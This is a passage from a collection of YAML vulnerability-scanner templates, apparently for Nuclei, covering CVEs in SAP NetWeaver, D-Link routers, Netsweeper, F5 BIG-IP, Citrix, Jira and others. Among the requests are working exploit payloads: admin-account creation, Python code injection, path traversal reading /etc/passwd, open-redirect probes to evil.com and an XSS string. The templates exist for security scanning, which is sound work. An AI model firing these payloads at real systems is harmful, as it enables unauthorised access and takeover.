"localhost" 41 | part: body 42 | 43 | -------------------------------------------------------------------------------- /cves/CVE-2020-6287.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-6287 2 | 3 | info: 4 | name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard) 5 | author: dwisiswant0 6 | severity: critical 7 | 8 | # Affected Versions: 7.30, 7.31, 7.40, 7.50 9 | 10 | # p.s: 11 | # > Don't forget to change the default credentials 12 | # > to create new admin in associated file: 13 | # > `payloads/CVE-2020-6287.xml` 14 | 15 | # Ref: 16 | # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287 17 | 18 | requests: 19 | - payloads: 20 | data: "payloads/CVE-2020-6287.xml" 21 | raw: 22 | - | 23 | POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 24 | Host: {{Hostname}} 25 | Content-Type: text/xml; charset=UTF-8 26 | Connection: close 27 | 28 | sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('data')}}userDetails 29 | matchers-condition: and 30 | matchers: 31 | - type: word 32 | words: 33 | - "urn:CTCWebServiceSi" 34 | part: body 35 | - type: status 36 | status: 37 | - 200 -------------------------------------------------------------------------------- /cves/CVE-2019-19743.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19743 2 | 3 | info: 4 | author: "pikpikcu" 5 | name: "D-Link DIR-615 - Privilege Escalation" 6 | severity: none 7 | 8 | # Source: https://www.exploit-db.com/exploits/47778 9 | # Vendor Homepage: http://www.dlink.co.in 10 | # Category: Hardware (Wi-fi Router) 11 | # Hardware Link: http://www.dlink.co.in/products/?pid=678 12 | # Hardware Version: T1 13 | # Firmware Version: 20.07 14 | # http://220.246.12.221 15 | # Create an account with a name:password(nuclei:password) change the privileges from user to root(admin) 16 | 17 | requests: 18 | # 
Privilege Escalation Post Request 19 | - raw: 20 | - | 21 | POST /form2userconfig.cgi HTTP/1.1 22 | Host: {{Hostname}} 23 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 24 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 25 | Accept-Language: en-US,en;q=0.5 26 | Accept-Encoding: gzip, deflate 27 | Content-Type: application/x-www-form-urlencoded 28 | Content-Length: 122 29 | Origin: {{Hostname}} 30 | Connection: close 31 | Referer: {{Hostname}}/userconfig.htm 32 | Upgrade-Insecure-Requests: 1 33 | 34 | username=nuclei&privilege=2&newpass=password&confpass=password&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send 35 | 36 | matchers-condition: and 37 | matchers: 38 | - type: status 39 | status: 40 | - 200 41 | -------------------------------------------------------------------------------- /vulnerabilities/weblogic-servlet-xss.yml: -------------------------------------------------------------------------------- 1 | id: Serverlet XSS # WebLogic 2 | 3 | info: 4 | author: "pikpikcu" 5 | name: "WebLogic Servlet/2.5 JSP/2.1 XSS" 6 | severity: Medium 7 | 8 | # Payloads: '"> 9 | # X-Powered-by: Servlet/2.5 JSP/2.1 10 | # Test on shodan dork: - port:7001 Weblogic 11 | # - port:7001 12 | requests: 13 | - raw: 14 | - | 15 | POST /defaultroot/LogonAction.do HTTP/1.1 16 | Host: {{Hostname}} 17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 18 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 19 | Accept-Language: en-US,en;q=0.5 20 | Accept-Encoding: gzip, deflate 21 | Content-Type: application/x-www-form-urlencoded 22 | Content-Length: 277 23 | DNT: 1 24 | Connection: close 25 | Referer: {{Hostname}}/defaultroot/login.jsp 26 | 27 | 
inputPwdErrorNum=0&maxErrorNum=6&domainAccount=whir&userName=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28%27xss%27%29%3C%2Fscript%3E&userPassword=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28%27xss%27%29%3C%2Fscript%3E&localeCode=zh_cn&isRemember=&keyDigest= 28 | 29 | matchers-condition: and 30 | matchers: 31 | - type: status 32 | status: 33 | - 200 34 | - type: word 35 | words: 36 | - | 37 | '"> 38 | -------------------------------------------------------------------------------- /cves/CVE-2019-8451.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-8451 2 | 3 | info: 4 | name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource 5 | author: "TechbrunchFR" 6 | severity: medium 7 | 8 | # On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important 9 | # security issue reported in August 2019. 10 | 11 | # CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in 12 | # the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. 13 | # An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable 14 | # Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal 15 | # network resources. 16 | # https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in 17 | # https://twitter.com/benmontour/status/1177250393220239360 18 | # https://twitter.com/ojensen5115/status/1176569607357730817 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' 24 | headers: 25 | X-Atlassian-token: no-check 26 | matchers: 27 | - type: word 28 | name: ssrf-response-body 29 | words: 30 | - '

This domain is for use in illustrative examples in documents.' 31 | part: body 32 | -------------------------------------------------------------------------------- /panels/swagger-panel.yaml: -------------------------------------------------------------------------------- 1 | id: swagger-panel 2 | 3 | info: 4 | name: Swagger API Panel 5 | author: Ice3man 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/swagger/index.html" 12 | - "{{BaseURL}}/swagger-ui.html" 13 | - "{{BaseURL}}/swagger/swagger-ui.html" 14 | - "{{BaseURL}}/api/swagger-ui.html" 15 | - "{{BaseURL}}/api-docs/swagger.json" 16 | - "{{BaseURL}}/swagger.json" 17 | - "{{BaseURL}}/swagger/v1/swagger.json" 18 | - "{{BaseURL}}/api/index.html" 19 | - "{{BaseURL}}/api/docs/" 20 | - "{{BaseURL}}/api/swagger.json" 21 | - "{{BaseURL}}/api/swagger.yaml" 22 | - "{{BaseURL}}/api/swagger.yml" 23 | - "{{BaseURL}}/api/swagger/index.html" 24 | - "{{BaseURL}}/api/swagger/swagger-ui.html" 25 | - "{{BaseURL}}/api/api-docs/swagger.json" 26 | - "{{BaseURL}}/api/swagger-ui/swagger.json" 27 | - "{{BaseURL}}/api/apidocs/swagger.json" 28 | - "{{BaseURL}}/api/swagger-ui/api-docs" 29 | - "{{BaseURL}}/api/api-docs" 30 | - "{{BaseURL}}/api/apidocs" 31 | - "{{BaseURL}}/api/swagger" 32 | - "{{BaseURL}}/api/swagger/static/index.html" 33 | - "{{BaseURL}}/api/swagger-resources" 34 | - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" 35 | - "{{BaseURL}}/api/__swagger__/" 36 | - "{{BaseURL}}/api/_swagger_/" 37 | - "{{BaseURL}}/api/spec/swagger.json" 38 | - "{{BaseURL}}/api/swagger/ui/index" 39 | - "{{BaseURL}}/api/api/schema/" 40 | matchers: 41 | - type: word 42 | words: 43 | - "\"swagger\":" 44 | - "Swagger UI" 45 | condition: or 46 | -------------------------------------------------------------------------------- /vulnerabilities/open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: open-redirect 2 | 3 | info: 4 | name: Open Redirect 
Detection 5 | author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | 11 | path: 12 | - "{{BaseURL}}/evil.com/" 13 | - "{{BaseURL}}///;@evil.com" 14 | - "{{BaseURL}}/////evil.com" 15 | - "{{BaseURL}}//evil.com/%2F.." 16 | - "{{BaseURL}}//evil.com/..;/css" 17 | - "{{BaseURL}}/evil%E3%80%82com" 18 | - "{{BaseURL}}/%5Cevil.com" 19 | - "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com" 20 | matchers: 21 | - type: regex 22 | regex: 23 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' 24 | part: header 25 | -------------------------------------------------------------------------------- /basic-detections/general-tokens.yaml: -------------------------------------------------------------------------------- 1 | id: general-tokens 2 | 3 | info: 4 | name: General Tokens 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - 
'{{BaseURL}}' 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 18 | - regex("API[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 19 | - regex("KEY[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 20 | - regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 21 | - regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 22 | - regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) 23 | extractors: 24 | - type: regex 25 | part: body 26 | regex: 27 | - (T|t)(O|o)(K|k)(E|e)(N|n)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)+()*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 28 | - (A|a)(P|p)(Ii)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)( )*(\''|")?[0-9A-Za-z\-_]+(\''|")? 29 | - (K|k)(E|e)(Y|y)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)( )*(\''|")?[0-9A-Za-z\-_]+(\''|")? 30 | - (S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)()*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 31 | - (A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 32 | - (P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? 33 | -------------------------------------------------------------------------------- /cves/CVE-2020-13167.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-13167 2 | 3 | info: 4 | name: Netsweeper WebAdmin unixlogin.php Python Code Injection 5 | author: dwisiswant0 6 | severity: critical 7 | 8 | # This template exploits a Python code injection in the Netsweeper 9 | # WebAdmin component's unixlogin.php script, for versions 6.4.4 and 10 | # prior, to execute code as the root user. 
11 | 12 | # Authentication is bypassed by sending a random whitelisted Referer 13 | # header in each request. 14 | 15 | # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs. 16 | # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has 17 | # been confirmed exploitable. 18 | 19 | # References: 20 | # - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ 21 | # - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says 22 | 23 | requests: 24 | - method: GET 25 | path: 26 | # Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out 27 | - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" 28 | - "{{BaseURL}}/webadmin/out" 29 | headers: 30 | Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php" 31 | User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)" 32 | Connection: "close" 33 | matchers-condition: and 34 | matchers: 35 | - type: word 36 | words: 37 | - "nonexistent" 38 | part: body 39 | - type: status 40 | status: 41 | - 200 -------------------------------------------------------------------------------- /files/zip-backup-files.yaml: -------------------------------------------------------------------------------- 1 | id: zip-backup-files 2 | 3 | info: 4 | name: Compressed Web folder 5 | author: Toufik Airane - https://github.com/@toufik.airane 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/{{Hostname}}.7z" 12 | - "{{BaseURL}}/{{Hostname}}.bz2" 13 | - "{{BaseURL}}/{{Hostname}}.gz" 14 | - "{{BaseURL}}/{{Hostname}}.lz" 15 | - "{{BaseURL}}/{{Hostname}}.rar" 16 | - 
"{{BaseURL}}/{{Hostname}}.tar.gz" 17 | - "{{BaseURL}}/{{Hostname}}.xz" 18 | - "{{BaseURL}}/{{Hostname}}.zip" 19 | - "{{BaseURL}}/{{Hostname}}.z" 20 | - "{{BaseURL}}/{{Hostname}}.tar.z" 21 | - "{{BaseURL}}/{{Hostname}}.db" 22 | - "{{BaseURL}}/{{Hostname}}.sqlite" 23 | - "{{BaseURL}}/{{Hostname}}.sqlitedb" 24 | - "{{BaseURL}}/{{Hostname}}.sql.7z" 25 | - "{{BaseURL}}/{{Hostname}}.sql.bz2" 26 | - "{{BaseURL}}/{{Hostname}}.sql.gz" 27 | - "{{BaseURL}}/{{Hostname}}.sql.lz" 28 | - "{{BaseURL}}/{{Hostname}}.sql.rar" 29 | - "{{BaseURL}}/{{Hostname}}.sql.tar.gz" 30 | - "{{BaseURL}}/{{Hostname}}.sql.xz" 31 | - "{{BaseURL}}/{{Hostname}}.sql.zip" 32 | - "{{BaseURL}}/{{Hostname}}.sql.z" 33 | - "{{BaseURL}}/{{Hostname}}.sql.tar.z" 34 | matchers-condition: and 35 | matchers: 36 | - type: binary 37 | binary: 38 | - "377ABCAF271C" # 7z 39 | - "314159265359" # bz2 40 | - "53514c69746520666f726d6174203300" # SQLite format 3. 41 | - "1f8b" # gz tar.gz 42 | - "526172211A0700" # rar RAR archive version 1.50 43 | - "526172211A070100" # rar RAR archive version 5.0 44 | - "FD377A585A0000" # xz tar.xz 45 | - "1F9D" # z tar.z 46 | - "1FA0" # z tar.z 47 | - "4C5A4950" # lz 48 | - "504B0304" # zip 49 | condition: or 50 | part: body 51 | - type: status 52 | status: 53 | - 200 54 | -------------------------------------------------------------------------------- /technologies/ntlm-directories.yaml: -------------------------------------------------------------------------------- 1 | id: ntlm-directories 2 | 3 | info: 4 | name: Discovering directories w/ NTLM 5 | author: puzzlepeaches 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/abs/" 12 | - "{{BaseURL}}/adfs/services/trust/2005/windowstransport" 13 | - "{{BaseURL}}/aspnet_client/" 14 | - "{{BaseURL}}/autodiscover/" 15 | - "{{BaseURL}}/autoupdate/" 16 | - "{{BaseURL}}/certenroll/" 17 | - "{{BaseURL}}/certprov/" 18 | - "{{BaseURL}}/certsrv/" 19 | - "{{BaseURL}}/conf/" 20 | - "{{BaseURL}}/deviceupdatefiles_ext/" 
21 | - "{{BaseURL}}/deviceupdatefiles_int/" 22 | - "{{BaseURL}}/dialin/" 23 | - "{{BaseURL}}/ecp/" 24 | - "{{BaseURL}}/etc/" 25 | - "{{BaseURL}}/ews/" 26 | - "{{BaseURL}}/exchange/" 27 | - "{{BaseURL}}/exchweb/" 28 | - "{{BaseURL}}/groupexpansion/" 29 | - "{{BaseURL}}/hybridconfig/" 30 | - "{{BaseURL}}/mcx/" 31 | - "{{BaseURL}}/mcx/mcxservice.svc" 32 | - "{{BaseURL}}/meet/" 33 | - "{{BaseURL}}/meeting/" 34 | - "{{BaseURL}}/microsoft-server-activesync/" 35 | - "{{BaseURL}}/oab/" 36 | - "{{BaseURL}}/ocsp/" 37 | - "{{BaseURL}}/owa/" 38 | - "{{BaseURL}}/persistentchat/" 39 | - "{{BaseURL}}/phoneconferencing/" 40 | - "{{BaseURL}}/powershell/" 41 | - "{{BaseURL}}/public/" 42 | - "{{BaseURL}}/reach/sip.svc" 43 | - "{{BaseURL}}/requesthandler/" 44 | - "{{BaseURL}}/requesthandlerext/" 45 | - "{{BaseURL}}/rgs/" 46 | - "{{BaseURL}}/rgsclients/" 47 | - "{{BaseURL}}/rpc/" 48 | - "{{BaseURL}}/rpcwithcert/" 49 | - "{{BaseURL}}/scheduler/" 50 | - "{{BaseURL}}/ucwa/" 51 | - "{{BaseURL}}/unifiedmessaging/" 52 | - "{{BaseURL}}/webticket/" 53 | - "{{BaseURL}}/webticket/webticketservice.svc" 54 | - "{{BaseURL}}/webticket/webticketservice.svcabs/" 55 | matchers: 56 | - type: word 57 | words: 58 | - "Www-Authenticate" 59 | part: header 60 | -------------------------------------------------------------------------------- /technologies/linkerd-ssrf-detect.yaml: -------------------------------------------------------------------------------- 1 | id: linkerd-ssrf-detect 2 | 3 | # Detect the Linkerd service by overriding the delegation table and 4 | # inspect the response for: 5 | # - a "Via: .. linkerd .." 6 | # - a "l5d-err" and/or a "l5d-success" header 7 | # - a verbose timeout error (binding timeout) 8 | # - a full response 9 | # The full-response case indicates a possible SSRF condition, the others 10 | # only indicates the service presence. 
11 | # 12 | # If a full-response is returned you should really manually probe requests with 13 | # the following header values: 14 | # 15 | # - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts 16 | # - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata 17 | 18 | info: 19 | name: Linkerd SSRF detection 20 | author: dudez 21 | severity: info 22 | 23 | requests: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}/" 27 | headers: 28 | l5d-dtab: /svc/* => /$/inet/example.com/443 29 | 30 | matchers-condition: or 31 | matchers: 32 | - type: regex 33 | name: via-linkerd-present 34 | regex: 35 | - '(?mi)^Via\s*?:.*?linkerd.*$' 36 | part: header 37 | 38 | - type: regex 39 | name: l5d-err-present 40 | regex: 41 | - '(?mi)^l5d-err:.*$' 42 | part: header 43 | 44 | - type: regex 45 | name: l5d-success-class-present 46 | regex: 47 | - '(?mi)^l5d-success-class: 0.*$' 48 | part: header 49 | 50 | - type: word 51 | name: ssrf-response-body 52 | words: 53 | - '

This domain is for use in illustrative examples in documents.' 54 | part: body 55 | 56 | - type: regex 57 | name: resolve-timeout-error-present 58 | regex: 59 | - '(?mi)Exceeded .*? binding timeout while resolving name' 60 | part: body 61 | 62 | - type: regex 63 | name: dynbind-error-present 64 | regex: 65 | - '(?mi)exceeded .*? to unspecified while dyn binding' 66 | part: body 67 | -------------------------------------------------------------------------------- /cves/CVE-2020-5902.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5902 2 | 3 | info: 4 | name: F5 BIG-IP TMUI RCE 5 | author: madrobot & dwisiswant0 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" 12 | - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release" 13 | - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license" 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0:" 22 | - "BIG-IP release ([\\d.]+)" 23 | - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" 24 | condition: or 25 | part: body 26 | - raw: 27 | - | 28 | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 29 | Host: {{Hostname}} 30 | Connection: close 31 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 32 | 33 | command=create%20cli%20alias%20private%20list%20command%20bash 34 | - | 35 | POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 36 | Host: {{Hostname}} 37 | Connection: close 38 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 39 | 40 | fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d 41 | - | 42 | POST /tmui/locallb/workspace/tmshCmd.jsp 
HTTP/1.1 43 | Host: {{Hostname}} 44 | Connection: close 45 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 46 | 47 | command=list%20%2Ftmp%2Fnonexistent 48 | - | 49 | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 50 | Host: {{Hostname}} 51 | Connection: close 52 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 53 | 54 | command=delete%20cli%20alias%20private%20list 55 | matchers-condition: and 56 | matchers: 57 | - type: status 58 | status: 59 | - 200 60 | - type: word 61 | words: 62 | - "h3ll0_w0Rld" -------------------------------------------------------------------------------- /cves/CVE-2020-8193.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-8193 2 | 3 | info: 4 | name: Citrix unauthenticated LFI 5 | author: pdteam 6 | severity: high 7 | 8 | # Source:- https://github.com/jas502n/CVE-2020-8193 9 | 10 | requests: 11 | - raw: 12 | - | 13 | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 16 | Content-Type: application/xml 17 | X-NITRO-USER: xpyZxwy6 18 | X-NITRO-PASS: xWXHUJ56 19 | 20 | 21 | 22 | - | 23 | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 24 | Host: {{Hostname}} 25 | User-Agent: python-requests/2.24.0 26 | Accept: */* 27 | Connection: close 28 | 29 | - | 30 | GET /menu/neo HTTP/1.1 31 | Host: {{Hostname}} 32 | User-Agent: python-requests/2.24.0 33 | Accept: */* 34 | Connection: close 35 | 36 | - | 37 | GET /menu/stc HTTP/1.1 38 | Host: {{Hostname}} 39 | User-Agent: python-requests/2.24.0 40 | Accept: */* 41 | Connection: close 42 | 43 | - | 44 | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 45 | Host: {{Hostname}} 46 | User-Agent: 
python-requests/2.24.0 47 | Accept: */* 48 | Connection: close 49 | Content-Type: application/xml 50 | X-NITRO-USER: oY39DXzQ 51 | X-NITRO-PASS: ZuU9Y9c1 52 | rand_key: randkey 53 | 54 | 55 | 56 | - | 57 | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 58 | Host: {{Hostname}} 59 | User-Agent: python-requests/2.24.0 60 | Accept: */* 61 | Connection: close 62 | Content-Type: application/xml 63 | X-NITRO-USER: oY39DXzQ 64 | X-NITRO-PASS: ZuU9Y9c1 65 | rand_key: randkey 66 | 67 | 68 | 69 | cookie-reuse: true 70 | 71 | # Using cookie-reuse to maintain session between each request, same as browser. 72 | 73 | extractors: 74 | - type: regex 75 | name: randkey 76 | part: body 77 | internal: true 78 | regex: 79 | - "(?m)[0-9]{3,10}\\.[0-9]+" 80 | 81 | # Using rand_key as dynamic variable to make use of extractors at run time. 82 | 83 | 84 | matchers: 85 | - type: regex 86 | regex: 87 | - "root:[x*]:0:0:" 88 | part: body -------------------------------------------------------------------------------- /vulnerabilities/local-file-inclusion.yaml: -------------------------------------------------------------------------------- 1 | id: LFI 2 | 3 | info: 4 | name: Local File Inclusion 5 | author: pikpikcu 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/etc/passwd' 12 | - '{{BaseURL}}/etc/shadowd' 13 | - '{{BaseURL}}/etc/passwd' 14 | - '{{BaseURL}}/etc/passwdd' 15 | - '{{BaseURL}}../etc/passwd' 16 | - '{{BaseURL}}../etc/passwdd' 17 | - '{{BaseURL}}../../etc/passwd' 18 | - '{{BaseURL}}../../etc/passwdd' 19 | - '{{BaseURL}}../../../etc/passwd' 20 | - '{{BaseURL}}../../../etc/passwdd' 21 | - '{{BaseURL}}../../../../etc/passwd' 22 | - '{{BaseURL}}../../../../etc/passwdd' 23 | - '{{BaseURL}}../../../../../etc/passwd' 24 | - '{{BaseURL}}../../../../../etc/passwdd' 25 | - '{{BaseURL}}../../../../../../etc/passwd' 26 | - '{{BaseURL}}../../../../../../etc/passwdd' 27 | - '{{BaseURL}}../../../../../../../etc/passwd' 28 | - 
'{{BaseURL}}../../../../../../../etc/passwdd' 29 | - '{{BaseURL}}../../../../../../../../etc/passwd' 30 | - '{{BaseURL}}../../../../../../../../etc/passwdd' 31 | - '{{BaseURL}}../../../../../../../../../etc/passwd' 32 | - '{{BaseURL}}../../../../../../../../../etc/passwdd' 33 | - '{{BaseURL}}../../../../../../../../../../etc/passwd' 34 | - '{{BaseURL}}../../../../../../../../../../etc/passwdd' 35 | - '{{BaseURL}}../../../../../../../../../../../etc/passwd' 36 | - '{{BaseURL}}../../../../../../../../../../../etc/passwdd' 37 | - '{{BaseURL}}../../../../../../../../../../../../etc/passwd' 38 | - '{{BaseURL}}../../../../../../../../../../../../etc/passwdd' 39 | - '{{BaseURL}}../../../../../../../../../../../../../etc/passwd' 40 | - '{{BaseURL}}../../../../../../../../../../../../../etc/passwdd' 41 | - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwd' 42 | - '{{BaseURL}}../../../../../../../../../../../../../../etc/passwdd' 43 | - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwd' 44 | - '{{BaseURL}}../../../../../../../../../../../../../../../etc/passwdd' 45 | - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwd' 46 | - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/passwdd' 47 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwd' 48 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/passwdd' 49 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwd' 50 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/passwdd' 51 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwd' 52 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/passwdd' 53 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwd' 54 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/passwdd' 55 | - 
'{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwd' 56 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/passwdd' 57 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwd' 58 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/passwdd' 59 | - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadowd' 60 | 61 | matchers: 62 | - type: regex 63 | regex: 64 | - "root:[x*]:0:0:" 65 | - "root:" 66 | part: body 67 | -------------------------------------------------------------------------------- /security-misconfiguration/springboot-detect.yaml: -------------------------------------------------------------------------------- 1 | id: springboot-actuators 2 | 3 | info: 4 | name: Detect the exposure of Springboot Actuators 5 | author: that_juan_ & dwisiswant0 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/actuator" 12 | - "{{BaseURL}}/actuator/auditevents" 13 | - "{{BaseURL}}/actuator/auditLog" 14 | - "{{BaseURL}}/actuator/beans" 15 | - "{{BaseURL}}/actuator/caches" 16 | - "{{BaseURL}}/actuator/conditions" 17 | - "{{BaseURL}}/actuator/configprops" 18 | - "{{BaseURL}}/actuator/configurationMetadata" 19 | - "{{BaseURL}}/actuator/dump" 20 | - 